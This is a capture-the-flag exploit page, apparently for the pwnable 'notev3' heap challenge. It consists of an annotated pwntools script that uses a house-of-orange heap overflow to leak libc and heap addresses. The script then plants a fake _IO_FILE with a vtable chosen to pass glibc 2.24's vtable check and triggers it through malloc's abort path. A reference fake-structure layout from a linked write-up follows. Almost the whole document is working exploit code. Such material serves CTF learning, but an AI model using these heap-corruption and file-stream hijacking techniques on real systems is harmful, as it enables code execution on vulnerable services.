Vtable check bypass

예제 pwnable.tw notev3

from pwn import *
#context.log_level = 'debug'
def make_note(size,title):
    """Menu option 1: create a note, answering only the size and title prompts.

    ``size`` is stringified and sent as a line; ``title`` is sent raw
    (sendafter, no newline appended). Nothing is sent for a ``Note:`` prompt
    -- compare make_note1, which does answer it.
    """
    steps = (
        (r.sendlineafter, '>', '1'),
        (r.sendlineafter, 'Size:', str(size)),
        (r.sendafter, 'Title:', title),
    )
    for send, prompt, answer in steps:
        send(prompt, answer)
 
def make_note1(size,title,note):
    """Menu option 1 with all three prompts answered: size, title and body.

    Unlike make_note, this also replies to the ``Note:`` prompt. Title and
    body are sent raw (no trailing newline) so the caller controls their
    exact bytes.
    """
    menu_choice = '1'
    r.sendlineafter('>', menu_choice)
    r.sendlineafter('Size:', str(size))
    for prompt, raw in (('Title:', title), ('Note:', note)):
        r.sendafter(prompt, raw)
 
def edit_note(idx,data):
    """Menu option 2: replace the body of note ``idx`` with ``data``.

    The index is sent as a line; ``data`` goes out via sendafter, i.e.
    exactly as given, because the payloads built in this script are binary.
    """
    def reply(prompt, text, newline):
        (r.sendlineafter if newline else r.sendafter)(prompt, text)

    reply('>', '2', True)
    reply('Note:', str(idx), True)
    reply('Data:', data, False)
 
def list_note():
    """Menu option 3: have the service print its notes (the leaks below read this output)."""
    option = '3'
    r.sendlineafter('>', option)
 
#r=process('./challenge',env={'LD_PRELOAD':'alpine-libc-2.24.so'})
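# Exploit for the notev3 challenge (alpine glibc 2.24), following the
# house-of-orange / vtable-check-bypass technique of the linked write-up.
# What the script relies on, as far as is visible here: the service accepts
# a size of -1 for a note, and edit_note apparently lets the client write far
# past that note's chunk into allocator metadata. Bounds-checking the size
# and the edit length on the service side would close this; on the libc side
# the layout below is specific to the 2.24 stream-flush path.
r=remote('svc.pwnable.xyz',30041)
win=0x4008a2                 # address in ./challenge that the final call is aimed at
script='''
'''
_IO_str_jumps_off=0x390500   # not used below; the vtable address is derived from _IO_file_jumps instead
#debug = +21640
#server = -(libc.symbols['__malloc_hook']+88+0x10) 
e=ELF('./challenge')
libc=ELF('./alpine-libc-2.24.so')

# --- Step 1: corrupt the top chunk and leak a libc pointer -----------------
# Note 0 is created with size -1, then edited with more data than a 0x30
# chunk holds. The bytes '\xb1\x0f\x00' land where the next chunk's size
# field is expected -- presumably shrinking the top chunk to 0xfb1 (the
# house-of-orange opener). TODO confirm the offsets against the binary.
make_note(-1,'AAAA')#1
edit_note(0,p64(0)+p64(0x31)+p64(0)*5+'\xb1\x0f\x00'+'\x00'*0xff)
# A 0x1000-byte request is larger than the shrunk top, so the allocator has
# to discard the old top chunk (expected to end up in the unsorted bin).
make_note1(0x1000,'\n','\x00'*0xff)#2
# Note 3's title is the marker that list_note() output is searched for; the
# bytes printed right after it are an allocator pointer.
make_note(-1,'AAAA'*2)#3
list_note()
r.recvuntil('A'*8)
# Read up to and including the 0x7f byte, then zero-pad to 8 bytes: the leak
# is treated as a 6-byte user-space libc pointer.
value=u64(r.recvuntil('\x7f').ljust(8,'\x00'))
log.info(hex(value))
# Fixed: this line was missing its closing parenthesis (SyntaxError); the
# commented-out 'server' line above carries the intended expression. The
# leaked value is assumed to lie 88+0x10 bytes past __malloc_hook, inside
# main_arena.
libc_base=value-(libc.symbols['__malloc_hook']+88+0x10)
# 0x10 is pre-subtracted so the value can be used directly as the fake bk
# pointer (the reference layout at the bottom of the page writes
# _IO_list_all-0x10 there).
_IO_list_all=libc_base+libc.symbols['_IO_list_all']-0x10
log.info(hex(libc_base))
log.info(hex(_IO_list_all))

# --- Step 2: heap address leak ---------------------------------------------
# Re-fill note 0 with a recognisable run of 'A's so the bytes that follow it
# in the listing can be located.
heap_leak=p64(0)+p64(0x31)+'A'*72
edit_note(0,heap_leak)
list_note()
r.recvuntil('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
# Only 4 bytes are read. The ':' -> NUL substitution presumably strips a
# separator the listing prints right after them; it would also corrupt a
# genuine 0x3a byte of the address. The -0x50 rebase is unverified here.
# NOTE: `heap` is only logged -- nothing below uses it.
heap=u64(r.recv(4).ljust(8,'\x00').replace('\x3a','\x00'))-0x50
log.info(hex(heap))

# --- Step 3: fake chunk doubling as a fake _IO_FILE ------------------------
# The edit of note 2 first rewrites that note's own header (size 0x31) and
# then lays the fake structure right behind it. Field order follows the
# reference layout quoted at the bottom of this page.
payload=p64(0)+p64(0x31)+p64(0)*4
# 0x00 flags, 0x08 fake size 0x61, 0x10 fd, 0x18 bk -> _IO_list_all-0x10
fake=p64(0)+p64(0x61)+p64(libc_base)+p64(_IO_list_all)
# 0x20 _IO_write_base=2 < 0x28 _IO_write_ptr=3, presumably so the stream
# appears to have pending output when the list is flushed.
fake+=p64(2)+p64(3)
# 0x30 _IO_write_end, 0x38 _IO_buf_base -> "/bin/sh" in libc
fake+=p64(0)+p64(libc_base+list(libc.search('/bin/sh'))[0])
fake+=p64(0)*0x10
fake+=p64(0)                   # 0xc0 mode
fake+=p64(0)*2
# 0xd8 vtable. The pointer is an address inside libc's own vtable region,
# computed from _IO_file_jumps (presumably _IO_str_jumps-8 as in the
# reference; _IO_str_jumps itself is not an exported symbol). Because it
# stays within the vtable section rather than pointing at the heap, glibc
# 2.24's vtable validation accepts it -- the "vtable check bypass" of the
# page title.
fake+=p64(libc_base+libc.symbols['_IO_file_jumps']+0xc0-0x8)
fake=fake.ljust(0xe8,'\x00')
# 0xe8 is the slot the reference layout fills with `system`; here it is the
# challenge's win address, repeated (presumably to tolerate small offset
# differences).
fake+=p64(win)*40
payload+=fake
edit_note(2,payload)

# --- Step 4: trigger -------------------------------------------------------
# One more allocation request: with the unsorted bin corrupted, malloc's
# error path aborts, and abort flushes the stream list that now includes
# the fake _IO_FILE. (Later glibc releases changed this path; the layout
# above is tied to the 2.24 build shipped with the challenge.)
r.sendlineafter('>','1')
r.sendlineafter('Size:','1')
#gdb.attach(r,script)
r.interactive()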

https://st4nw.github.io/glibc2.24-orange

# Reference layout from the linked glibc 2.24 write-up: a fake chunk whose
# user data is read as a fake _IO_FILE_plus. _IO_list_all, binsh,
# _IO_str_jumps and system are expected to be defined by the surrounding
# exploit (they are not defined in this snippet). Offsets in the margin are
# relative to the start of `fake`.
fake = p64(0) + p64(0x61)                  # 0x00 flags / prev_size, 0x08 fake chunk size 0x61
fake += p64(0) + p64(_IO_list_all-0x10)    # 0x10 fd, 0x18 bk -> _IO_list_all-0x10 (unsorted-bin write target)
fake += p64(2) + p64(3)                    # 0x20 _IO_write_base < 0x28 _IO_write_ptr (stream looks like it has pending output)
fake += p64(0) + p64(binsh) # 0x30 _IO_write_end, 0x38 _IO_buf_base -> "/bin/sh"
fake += p64(0) * 0x10                      # 0x40..0xbf zeroed
fake += p64(0) # 0xc0 mode
fake += p64(0) * 2                         # 0xc8, 0xd0
fake += p64(_IO_str_jumps-0x8)             # 0xd8 vtable: inside libc's vtable section, so the 2.24 vtable check passes; the -8 shift picks the finish entry (see linked write-up)
fake = fake.ljust(0xe8, '\x00')
fake += p64(system)                        # 0xe8: the function pointer that the str-file finish path calls with _IO_buf_base as argument (per the write-up)